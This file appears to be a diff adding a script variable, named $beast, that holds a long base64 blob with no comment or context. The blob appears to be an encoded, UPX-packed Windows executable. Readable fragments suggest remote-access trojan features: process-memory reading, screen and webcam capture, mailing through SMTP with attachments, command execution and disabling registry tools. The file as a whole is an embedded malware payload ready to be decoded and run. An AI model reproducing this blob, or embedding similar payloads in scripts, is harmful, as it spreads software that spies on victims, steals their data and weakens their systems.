+$beast="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 